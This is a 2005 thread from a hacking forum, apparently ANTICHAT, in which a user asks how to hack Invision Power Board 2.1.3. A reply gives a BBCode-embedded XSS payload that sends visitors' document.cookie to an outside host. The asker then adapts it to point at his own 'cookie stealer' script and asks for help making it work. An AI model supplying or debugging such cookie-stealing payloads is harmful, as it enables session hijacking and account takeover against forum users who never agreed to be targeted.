ipb question

Discussion in 'Forum for discussion of ANTICHAT' started by caffine2, 27 Dec 2005.

  1. caffine2

    caffine2 New Member

    Joined:
    11 Aug 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    iS their a way to exploit Invision Power Board v2.1.3 and hack it?
     
  2. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    235
    Reputations:
    182
    No sploit :(
    but it have XSS
    HTML:
    [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
     
  3. caffine2

    caffine2 New Member

    Joined:
    11 Aug 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Hmm they must have patched it becuase everything before .com get's filterd out, and you see the xss?

    .com">wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
     
  4. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    this bug only for IE
     
  5. caffine2

    caffine2 New Member

    Joined:
    11 Aug 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    oooo, i get it except i have 1 more question,
    HTML:
    [email]black@bandit[url=http://www.google.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://mysite/webmaster/cookie32.php?"+document.cookie);`
    and for some reason it's not directing it to my cookie stealer i'm guessing it's due to the document.images, so in order for this to work do i need to make a dynamic signature?
     
    #5 caffine2, 27 Dec 2005
    Last edited: 27 Dec 2005
Loading...